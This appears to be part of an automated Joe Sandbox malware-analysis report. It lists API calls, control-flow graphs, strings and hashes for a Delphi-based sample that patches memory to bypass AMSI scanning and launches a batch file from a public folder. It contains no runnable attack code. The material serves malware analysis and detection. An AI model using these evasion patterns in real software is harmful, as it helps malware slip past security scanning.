                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029D5228: SysAllocStringLen.OLEAUT32(?,?), ref: 029D5236
                                                                                                                                            • RtlInitUnicodeString.N(?,?,00000000,02A2B676), ref: 02A2B624
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A2B676), ref: 02A2B63A
                                                                                                                                            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A2B676), ref: 02A2B659
                                                                                                                                              • Part of subcall function 029D4F68: SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1694942484-0
                                                                                                                                            • Opcode ID: bb9a37a2d1f2ccc3673f8f22f9c30ef81d32079bb7d5d53d17261869e6f73a69
                                                                                                                                            • Instruction ID: 84593af98e7b2b90a6e937d17eff1e4282e0b08a3f2d9c9b62d81bcadd178bfc
                                                                                                                                            • Opcode Fuzzy Hash: bb9a37a2d1f2ccc3673f8f22f9c30ef81d32079bb7d5d53d17261869e6f73a69
                                                                                                                                            • Instruction Fuzzy Hash: AB014471940208BBDB10EBA4CD41FCEB3BEEB48704F914871A601E6180EE74AB08DF64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029EEF38: CLSIDFromProgID.OLE32(00000000,?,00000000,029EEF85,?,?,?,00000000), ref: 029EEF65
                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,029EF078,00000000,00000000,029EEFF7,?,00000000,029EF067), ref: 029EEFE3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFromInstanceProg
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2151042543-0
                                                                                                                                            • Opcode ID: 456ed9c79ecbfa3c9b4c9a1e6201b4a93957f48719c4f5c3f3446e22e816bd07
                                                                                                                                            • Instruction ID: 51e968aa367101911738825647c668a81214f195b77e37d754af499766cf9317
                                                                                                                                            • Opcode Fuzzy Hash: 456ed9c79ecbfa3c9b4c9a1e6201b4a93957f48719c4f5c3f3446e22e816bd07
                                                                                                                                            • Instruction Fuzzy Hash: 7E01A7706087046EFB16DF649C1287EB7ADE7CA710F924875F902D2AC0EA745900D965
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetVersion.KERNEL32(00000000,02A3967E), ref: 02A39612
                                                                                                                                              • Part of subcall function 02A17420: GetCurrentProcessId.KERNEL32(?,00000000,02A17598), ref: 02A17441
                                                                                                                                              • Part of subcall function 02A17420: GlobalAddAtomA.KERNEL32(00000000), ref: 02A17474
                                                                                                                                              • Part of subcall function 02A17420: GetCurrentThreadId.KERNEL32 ref: 02A1748F
                                                                                                                                              • Part of subcall function 02A17420: GlobalAddAtomA.KERNEL32(00000000), ref: 02A174C5
                                                                                                                                              • Part of subcall function 02A17420: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,02A17598), ref: 02A174DB
                                                                                                                                              • Part of subcall function 02A17420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02A17598), ref: 02A1755F
                                                                                                                                              • Part of subcall function 02A17420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02A17570
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3557136124-0
                                                                                                                                            • Opcode ID: d83327c89ca37f07b565577d713db7dc6a5f95d00997f8d569864175cb61aae4
                                                                                                                                            • Instruction ID: 94e1996cf019bf659553d661f53b4db17043ac1b577c0dfb95644eae9e564195
                                                                                                                                            • Opcode Fuzzy Hash: d83327c89ca37f07b565577d713db7dc6a5f95d00997f8d569864175cb61aae4
                                                                                                                                            • Instruction Fuzzy Hash: 07F0C239A862409FEB12EF64FDC981677AAF78A7003854830E44187358CFB4EC238F45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,02A17598), ref: 02A17441
                                                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 02A17474
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02A1748F
                                                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 02A174C5
                                                                                                                                            • RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,02A17598), ref: 02A174DB
                                                                                                                                              • Part of subcall function 029E7B44: InitializeCriticalSection.KERNEL32(List,?,?,02A174F1,00000000,00000000,?,?,00000000,02A17598), ref: 029E7B63
                                                                                                                                              • Part of subcall function 02A17028: SetErrorMode.KERNEL32(00008000), ref: 02A17041
                                                                                                                                              • Part of subcall function 02A17028: GetModuleHandleA.KERNEL32(USER32,00000000,02A1718E,?,00008000), ref: 02A17065
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 02A17072
                                                                                                                                              • Part of subcall function 02A17028: LoadLibraryA.KERNEL32(imm32.dll,00000000,02A1718E,?,00008000), ref: 02A1708E
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 02A170B0
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02A170C5
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02A170DA
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 02A170EF
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02A17104
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02A17119
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 02A1712E
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 02A17143
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 02A17158
                                                                                                                                              • Part of subcall function 02A17028: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 02A1716D
                                                                                                                                              • Part of subcall function 02A17028: SetErrorMode.KERNEL32(?,02A17195,00008000), ref: 02A17188
                                                                                                                                              • Part of subcall function 02A21538: GetKeyboardLayout.USER32(00000000), ref: 02A2157D
                                                                                                                                              • Part of subcall function 02A21538: GetDC.USER32(00000000), ref: 02A215D2
                                                                                                                                              • Part of subcall function 02A21538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 02A215DC
                                                                                                                                              • Part of subcall function 02A21538: ReleaseDC.USER32(00000000,00000000), ref: 02A215E7
                                                                                                                                              • Part of subcall function 02A22740: LoadIconA.USER32(00000000,MAINICON), ref: 02A22837
                                                                                                                                              • Part of subcall function 02A22740: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A22869
                                                                                                                                              • Part of subcall function 02A22740: OemToCharA.USER32(?,?), ref: 02A2287C
                                                                                                                                              • Part of subcall function 02A22740: CharNextA.USER32(?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228BB
                                                                                                                                              • Part of subcall function 02A22740: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228C1
                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02A17598), ref: 02A1755F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02A17570
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                                                                                            • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                                                            • API String ID: 1515865724-1126952177
                                                                                                                                            • Opcode ID: b984f1575fa13578ad6ac579cf2252d15a483a656911cd9822ef3ad346b5a5c4
                                                                                                                                            • Instruction ID: 2ef22c4a3f1860771deda62ebdc829c0c6597c938ee9f0ecd9e067a5be7cd5ef
                                                                                                                                            • Opcode Fuzzy Hash: b984f1575fa13578ad6ac579cf2252d15a483a656911cd9822ef3ad346b5a5c4
                                                                                                                                            • Instruction Fuzzy Hash: D8414778A402059FDB00FFB8E88499EB7FAFB88310B019825E405E7351DF34A916DF65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5020 2a2bcf8-2a2bcfc 5021 2a2bd01-2a2bd06 5020->5021 5021->5021 5022 2a2bd08-2a2c1b2 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d49ec * 2 call 29d4b0c call 29d4a24 call 29d320c call 29d4980 * 2 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d49ec call 29d8eb0 call 29d4c4c call 29d507c call 29d50f8 call 29d49ec call 29d4c4c call 29d507c call 29d50f8 CreateProcessAsUserW call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 5021->5022 5182 2a2c1b7-2a2c1bb 5022->5182 5183 2a2c1c1-2a2c2c1 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 call 29d4b0c call 29d4c4c call 29d4980 call 29d4a98 call 29d4c4c call 29d4980 call 29efd38 WaitForSingleObject CloseHandle * 2 5182->5183 5184 2a2c2c6-2a2c313 call 29d47ac call 29d4f68 call 29d47ac call 29d4f68 call 29d47ac 5182->5184 5183->5184
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029EFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD70
                                                                                                                                              • Part of subcall function 029EFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFD7E
                                                                                                                                              • Part of subcall function 029EFD38: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 029EFD97
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB3
                                                                                                                                              • Part of subcall function 029EFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000,029EFE14), ref: 029EFDB9
                                                                                                                                              • Part of subcall function 029EFD38: GetCurrentProcess.KERNEL32(02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE3
                                                                                                                                              • Part of subcall function 029EFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000,00000000), ref: 029EFDE9
                                                                                                                                              • Part of subcall function 029EFD38: FreeLibrary.KERNEL32(74AE0000,00000000,02A6A35C,Function_00006ADC,00000004,02A6A360,00000000,02A6A35C,17D783FC,00000040,00000004,74AE0000,00000000,00000000,00000000,00000000), ref: 029EFDF4
                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02B5EBB8,02B5EBFC,ScanString,02A6A350,02A2C330,OpenSession,02A6A350), ref: 02A2C05F
                                                                                                                                            • WaitForSingleObject.KERNEL32(0000087C,000000FF,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,UacScan,02A6A350), ref: 02A2C2AB
                                                                                                                                            • CloseHandle.KERNEL32(0000087C,0000087C,000000FF,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,UacScan), ref: 02A2C2B6
                                                                                                                                            • CloseHandle.KERNEL32(00000898,0000087C,0000087C,000000FF,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330,ScanString,02A6A350,02A2C330,OpenSession,02A6A350,02A2C330), ref: 02A2C2C1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleProcess$CloseCurrentLibraryMemoryVirtual$AddressCreateFreeLoadModuleObjectProcProtectSingleUserWaitWrite
                                                                                                                                            • String ID: *"C:\Users\Public\Libraries\ClmgncrsO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                            • API String ID: 2776809114-2399156540
                                                                                                                                            • Opcode ID: 747564a2852070f6c3abdab04cca6853c087b561dfebc98a8bcf4b84b4424c37
                                                                                                                                            • Instruction ID: b1c88d242fd92f86fb9ba9f7135b00cdef9c5b930a7f3169d16f58bb4328bebc
                                                                                                                                            • Opcode Fuzzy Hash: 747564a2852070f6c3abdab04cca6853c087b561dfebc98a8bcf4b84b4424c37
                                                                                                                                            • Instruction Fuzzy Hash: A8F13431A001289BDB11EBA8D980FDEB3BBBF94710F11D4A6E005AB254DF30EE459F95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5238 2a22740-2a2274d 5239 2a22757-2a2276f call 29ed8bc 5238->5239 5240 2a2274f-2a22752 call 29d3bdc 5238->5240 5244 2a22771-2a22779 5239->5244 5245 2a2277f-2a22789 5239->5245 5240->5239 5244->5245 5246 2a2278b-2a22793 5245->5246 5247 2a22799-2a22890 call 29d38a0 * 3 call 29f7150 LoadIconA call 29f7524 GetModuleFileNameA OemToCharA call 29dce38 5245->5247 5246->5247 5260 2a22892-2a2289b call 29d9024 5247->5260 5261 2a228a0-2a228af call 29dce6c 5247->5261 5260->5261 5265 2a228b1 5261->5265 5266 2a228b4-2a228e9 CharNextA CharLowerA call 29d49f8 call 29eea38 5261->5266 5265->5266 5270 2a228ee-2a228fc 5266->5270 5271 2a22905-2a22934 call 2a24b14 call 2a25674 5270->5271 5272 2a228fe-2a22900 call 2a22a94 5270->5272 5278 2a22936-2a22942 call 29d3c34 5271->5278 5279 2a22945-2a2294c 5271->5279 5272->5271 5278->5279
                                                                                                                                            APIs
                                                                                                                                            • LoadIconA.USER32(00000000,MAINICON), ref: 02A22837
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A22869
                                                                                                                                            • OemToCharA.USER32(?,?), ref: 02A2287C
                                                                                                                                            • CharNextA.USER32(?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228BB
                                                                                                                                            • CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,02A17530,00000000,00000000,?,?,00000000,02A17598), ref: 02A228C1
                                                                                                                                              • Part of subcall function 02A22A94: GetClassInfoA.USER32(029D0000,02A22730,?), ref: 02A22AF3
                                                                                                                                              • Part of subcall function 02A22A94: RegisterClassA.USER32(02A3B650), ref: 02A22B0B
                                                                                                                                              • Part of subcall function 02A22A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 02A22BA7
                                                                                                                                              • Part of subcall function 02A22A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 02A22BC9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                                                            • String ID: MAINICON
                                                                                                                                            • API String ID: 2763768735-2283262055
                                                                                                                                            • Opcode ID: 5416931c4b5ed986a302939eb5efcc94c033cd7508856cf3f806627396ad05ed
                                                                                                                                            • Instruction ID: 0ad577a8b6f8ec7563c0431e674981195ae82c64b49a9d3c016da8b9f8a7d24c
                                                                                                                                            • Opcode Fuzzy Hash: 5416931c4b5ed986a302939eb5efcc94c033cd7508856cf3f806627396ad05ed
                                                                                                                                            • Instruction Fuzzy Hash: 31517C70A442858FDB40EF68C8C4B857BE5AB59304F4485F9DC48DF246DBBAD888CF61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5288 29d17c0-29d17d2 5289 29d17d8-29d17e8 5288->5289 5290 29d1a04-29d1a09 5288->5290 5291 29d17ea-29d17f7 5289->5291 5292 29d1840-29d1849 5289->5292 5293 29d1b1c-29d1b1f 5290->5293 5294 29d1a0f-29d1a20 5290->5294 5300 29d17f9-29d1806 5291->5300 5301 29d1810-29d181c 5291->5301 5292->5291 5297 29d184b-29d1857 5292->5297 5298 29d1b25-29d1b27 5293->5298 5299 29d1720-29d1749 VirtualAlloc 5293->5299 5295 29d19d4-29d19e1 5294->5295 5296 29d1a22-29d1a3e 5294->5296 5295->5296 5307 29d19e3-29d19f7 Sleep 5295->5307 5302 29d1a4c-29d1a5b 5296->5302 5303 29d1a40-29d1a48 5296->5303 5297->5291 5304 29d1859-29d1865 5297->5304 5305 29d177b-29d1781 5299->5305 5306 29d174b-29d1778 call 29d16e0 5299->5306 5308 29d1808-29d180c 5300->5308 5309 29d1830-29d183d 5300->5309 5310 29d188c-29d1895 5301->5310 5311 29d181e-29d182c 5301->5311 5313 29d1a5d-29d1a71 5302->5313 5314 29d1a74-29d1a7c 5302->5314 5312 29d1aa8-29d1abe 5303->5312 5304->5291 5315 29d1867-29d187a Sleep 5304->5315 5306->5305 5307->5296 5319 29d19f9-29d1a00 Sleep 5307->5319 5317 29d18c8-29d18d2 5310->5317 5318 29d1897-29d18a4 5310->5318 5325 29d1ad7-29d1ae3 5312->5325 5326 29d1ac0-29d1ace 5312->5326 5313->5312 5321 29d1a7e-29d1a96 5314->5321 5322 29d1a98-29d1a9a call 29d1668 5314->5322 5315->5291 5320 29d1880-29d1887 Sleep 5315->5320 5327 29d1944-29d1950 5317->5327 5328 29d18d4-29d18ff 5317->5328 5318->5317 5324 29d18a6-29d18ba Sleep 5318->5324 5319->5295 5320->5292 5331 29d1a9f-29d1aa7 5321->5331 5322->5331 5324->5317 5333 29d18bc-29d18c3 Sleep 5324->5333 5337 29d1ae5-29d1af8 5325->5337 5338 29d1b04 5325->5338 5326->5325 5334 29d1ad0 5326->5334 5329 29d1978-29d1987 call 29d1668 5327->5329 5330 29d1952-29d1964 5327->5330 5335 29d1918-29d1926 5328->5335 5336 29d1901-29d190f 5328->5336 5347 29d1999-29d19d2 5329->5347 5353 29d1989-29d1993 5329->5353 5340 29d1968-29d1976 5330->5340 5341 29d1966 5330->5341 5333->5318 5334->5325 5344 29d1928-29d1942 call 29d159c 5335->5344 5345 29d1994 5335->5345 5336->5335 5343 29d1911 5336->5343 5339 29d1b09-29d1b1b 5337->5339 5346 29d1afa-29d1aff call 29d159c 5337->5346 5338->5339 5340->5347 5341->5340 5343->5335 5344->5347 5345->5347 5346->5339
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?,029D209C), ref: 029D186C
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,029D209C), ref: 029D1882
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 0d987483abd115be2e09ec5d8ad907704f7f8f63b13a0729111fe2a3e9a7a5f6
                                                                                                                                            • Instruction ID: 7abad3e1e1de707bd9493e42cd75275fbf3b12a5622361facbe4b0f33a5074fa
                                                                                                                                            • Opcode Fuzzy Hash: 0d987483abd115be2e09ec5d8ad907704f7f8f63b13a0729111fe2a3e9a7a5f6
                                                                                                                                            • Instruction Fuzzy Hash: BCB13573A102118BCB15CF68E888365FBE1FB85359F18CAAED45D8B385DB70D852DB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5355 29d1b28-29d1b37 5356 29d1b3d-29d1b41 5355->5356 5357 29d1c08-29d1c0b 5355->5357 5360 29d1ba4-29d1bad 5356->5360 5361 29d1b43-29d1b4a 5356->5361 5358 29d1cf8-29d1cfc 5357->5358 5359 29d1c11-29d1c1b 5357->5359 5367 29d1784-29d17a7 call 29d16e0 VirtualFree 5358->5367 5368 29d1d02-29d1d07 5358->5368 5363 29d1c1d-29d1c29 5359->5363 5364 29d1bd8-29d1be5 5359->5364 5360->5361 5362 29d1baf-29d1bc3 Sleep 5360->5362 5365 29d1b4c-29d1b57 5361->5365 5366 29d1b78-29d1b7a 5361->5366 5362->5361 5369 29d1bc9-29d1bd4 Sleep 5362->5369 5372 29d1c2b-29d1c2e 5363->5372 5373 29d1c60-29d1c6e 5363->5373 5364->5363 5370 29d1be7-29d1bfb Sleep 5364->5370 5374 29d1b59-29d1b5e 5365->5374 5375 29d1b60-29d1b75 5365->5375 5376 29d1b7c-29d1b8d 5366->5376 5377 29d1b8f 5366->5377 5384 29d17a9-29d17b0 5367->5384 5385 29d17b2 5367->5385 5369->5360 5370->5363 5381 29d1bfd-29d1c04 Sleep 5370->5381 5380 29d1c32-29d1c36 5372->5380 5379 29d1c70-29d1c75 call 29d155c 5373->5379 5373->5380 5376->5377 5378 29d1b92-29d1b9f 5376->5378 5377->5378 5378->5359 5379->5380 5386 29d1c78-29d1c85 5380->5386 5387 29d1c38-29d1c3e 5380->5387 5381->5364 5390 29d17b5-29d17bf 5384->5390 5385->5390 5386->5387 5389 29d1c87-29d1c8e call 29d155c 5386->5389 5391 29d1c90-29d1c9a 5387->5391 5392 29d1c40-29d1c5e call 29d159c 5387->5392 5389->5387 5394 29d1c9c-29d1cc4 VirtualFree 5391->5394 5395 29d1cc8-29d1cf5 call 29d15fc 5391->5395
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,029D2080), ref: 029D1BB3
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,029D2080), ref: 029D1BCD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 7bbf17e82cd49d377d3b020eaa3d2fd02e377dfb3e1334304de9243c6eb282b0
